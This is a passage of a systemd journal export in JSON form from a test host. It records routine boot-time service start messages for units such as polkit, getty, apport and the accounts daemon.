"MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Permit User Sessions...", "UNIT" : "systemd-user-sessions.service", "INVOCATION_ID" : "a8e88e06d97b45368fb077320099c4fb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818344557" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31e;b=e2b08827b5804427b422c10c84f1567e;m=2a635d3;t=5bd16df69b53a;x=80321e018d4924f9", "__REALTIME_TIMESTAMP" : "1615280818730298", "__MONOTONIC_TIMESTAMP" : "44447187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "rsyslog.service", "INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "Started System Logging Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818352740" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31f;b=e2b08827b5804427b422c10c84f1567e;m=2a6361b;t=5bd16df69b583;x=37287d3f7131b98f", "__REALTIME_TIMESTAMP" : "1615280818730371", "__MONOTONIC_TIMESTAMP" : "44447259", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-user-sessions.service", "INVOCATION_ID" : "a8e88e06d97b45368fb077320099c4fb", "MESSAGE" : "Started Permit User Sessions.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818367486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=320;b=e2b08827b5804427b422c10c84f1567e;m=2a639f5;t=5bd16df69b95d;x=f8b3d302d5b0ac25", "__REALTIME_TIMESTAMP" : "1615280818731357", "__MONOTONIC_TIMESTAMP" : "44448245", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-logind.service", "INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "MESSAGE" : "Started Login Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818386163" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=321;b=e2b08827b5804427b422c10c84f1567e;m=2a63a5a;t=5bd16df69b9c1;x=a44c1ff0b2d9943a", "__REALTIME_TIMESTAMP" : "1615280818731457", "__MONOTONIC_TIMESTAMP" : "44448346", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Authorization Manager...", "UNIT" : "polkit.service", "INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818393304" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=322;b=e2b08827b5804427b422c10c84f1567e;m=2a63aa7;t=5bd16df69ba0e;x=93403d3ec28c7d8e", "__REALTIME_TIMESTAMP" : "1615280818731534", "__MONOTONIC_TIMESTAMP" : "44448423", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Unattended Upgrades Shutdown.", "UNIT" : "unattended-upgrades.service", "INVOCATION_ID" : "64957dc245ff4da68583f884d2b6aa74", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818400923" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=323;b=e2b08827b5804427b422c10c84f1567e;m=2a63b03;t=5bd16df69ba6b;x=9707bf8b74d46972", "__REALTIME_TIMESTAMP" : "1615280818731627", "__MONOTONIC_TIMESTAMP" : "44448515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Hostname Service...", "UNIT" : "systemd-hostnamed.service", "INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818410195" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=324;b=e2b08827b5804427b422c10c84f1567e;m=2a63b70;t=5bd16df69bad8;x=85db8a79d2d07ec9", "__REALTIME_TIMESTAMP" : "1615280818731736", "__MONOTONIC_TIMESTAMP" : "44448624", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Terminate Plymouth Boot Screen...", "UNIT" : "plymouth-quit.service", "INVOCATION_ID" : "c345885054b24af6bf1126493e521c75", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818417474" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=325;b=e2b08827b5804427b422c10c84f1567e;m=2a63bd1;t=5bd16df69bb38;x=81711fd38359bea3", "__REALTIME_TIMESTAMP" : "1615280818731832", "__MONOTONIC_TIMESTAMP" : "44448721", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Hold until boot process finishes up...", "UNIT" : "plymouth-quit-wait.service", "INVOCATION_ID" : "616c38d09ecf41b98f0a3c178beaa4b6", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818422758" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=326;b=e2b08827b5804427b422c10c84f1567e;m=2a63c48;t=5bd16df69bbb0;x=9d8e718c053be8b2", "__REALTIME_TIMESTAMP" : "1615280818731952", "__MONOTONIC_TIMESTAMP" : "44448840", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "plymouth-quit-wait.service", "INVOCATION_ID" : "616c38d09ecf41b98f0a3c178beaa4b6", "MESSAGE" : "Started Hold until boot process finishes up.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818433141" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=327;b=e2b08827b5804427b422c10c84f1567e;m=2a63cc0;t=5bd16df69bc27;x=1c70448b37921d8c", "__REALTIME_TIMESTAMP" : "1615280818732071", "__MONOTONIC_TIMESTAMP" : "44448960", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Serial Getty on ttyS0.", "UNIT" : "serial-getty@ttyS0.service", "INVOCATION_ID" : "6962682f850d410ab6ab4947892896cc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818438851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=328;b=e2b08827b5804427b422c10c84f1567e;m=2a63d13;t=5bd16df69bc7b;x=75b6885bd4fa244b", "__REALTIME_TIMESTAMP" : "1615280818732155", "__MONOTONIC_TIMESTAMP" : "44449043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Set console scheme...", "UNIT" : "setvtrgb.service", "INVOCATION_ID" : "f1b78fb9a2b84e2fa897cc4f1b9c2dbc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818446792" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=329;b=e2b08827b5804427b422c10c84f1567e;m=2a63d6b;t=5bd16df69bcd3;x=19536e76eaf38387", "__REALTIME_TIMESTAMP" : "1615280818732243", "__MONOTONIC_TIMESTAMP" : "44449131", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "plymouth-quit.service", "INVOCATION_ID" : "c345885054b24af6bf1126493e521c75", "MESSAGE" : "Started Terminate Plymouth Boot Screen.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818453725" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32a;b=e2b08827b5804427b422c10c84f1567e;m=2a63dbe;t=5bd16df69bd25;x=42e6870cfd4a68a1", "__REALTIME_TIMESTAMP" : "1615280818732325", "__MONOTONIC_TIMESTAMP" : "44449214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "setvtrgb.service", "INVOCATION_ID" : "f1b78fb9a2b84e2fa897cc4f1b9c2dbc", "MESSAGE" : "Started Set console scheme.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818468121" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32b;b=e2b08827b5804427b422c10c84f1567e;m=2a63e19;t=5bd16df69bd80;x=7c36cebfe0645687", "__REALTIME_TIMESTAMP" : "1615280818732416", "__MONOTONIC_TIMESTAMP" : "44449305", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Created slice system-getty.slice.", "UNIT" : "system-getty.slice", "INVOCATION_ID" : "125f02b327ec465b96e4c10b0e9ba337", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818470911" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32c;b=e2b08827b5804427b422c10c84f1567e;m=2a63e65;t=5bd16df69bdcd;x=aef5fe72952f47d", "__REALTIME_TIMESTAMP" : "1615280818732493", "__MONOTONIC_TIMESTAMP" : "44449381", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Getty on tty1.", "UNIT" : "getty@tty1.service", "INVOCATION_ID" : "8b46541929ef4e8aadfe0703f2a81028", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818480081" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32d;b=e2b08827b5804427b422c10c84f1567e;m=2a63ebb;t=5bd16df69be22;x=6b1b08f772d95efd", "__REALTIME_TIMESTAMP" : "1615280818732578", "__MONOTONIC_TIMESTAMP" : "44449467", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Login Prompts.", "UNIT" : "getty.target", "INVOCATION_ID" : "e1ddb495fc2f4c12b84162798cccd2bb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818484008" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32e;b=e2b08827b5804427b422c10c84f1567e;m=2a644a6;t=5bd16df69c40e;x=8ac4ec612bb0b149", "__REALTIME_TIMESTAMP" : "1615280818734094", "__MONOTONIC_TIMESTAMP" : "44450982", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "grub-common.service", "INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a", "MESSAGE" : "Started LSB: Record successful boot for GRUB.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818497851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32f;b=e2b08827b5804427b422c10c84f1567e;m=2a64531;t=5bd16df69c498;x=537110d2c3197afd", "__REALTIME_TIMESTAMP" : "1615280818734232", "__MONOTONIC_TIMESTAMP" : "44451121", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "apport.service", "INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26", "MESSAGE" : "Started LSB: automatic crash report generation.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818508165" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=330;b=e2b08827b5804427b422c10c84f1567e;m=2a64594;t=5bd16df69c4fb;x=c27d5488bc1c525f", "__REALTIME_TIMESTAMP" : "1615280818734331", "__MONOTONIC_TIMESTAMP" : "44451220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "polkit.service", "INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "MESSAGE" : "Started Authorization Manager.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552924" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=331;b=e2b08827b5804427b422c10c84f1567e;m=2a645de;t=5bd16df69c545;x=e5031d2cf2fb0f22", "__REALTIME_TIMESTAMP" : "1615280818734405", "__MONOTONIC_TIMESTAMP" : "44451294", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "accounts-daemon.service", "INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "MESSAGE" : "Started Accounts Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818557033" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=332;b=e2b08827b5804427b422c10c84f1567e;m=2a64624;t=5bd16df69c58c;x=10c48f30b9fda882", "__REALTIME_TIMESTAMP" : "1615280818734476", "__MONOTONIC_TIMESTAMP" : "44451364", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", 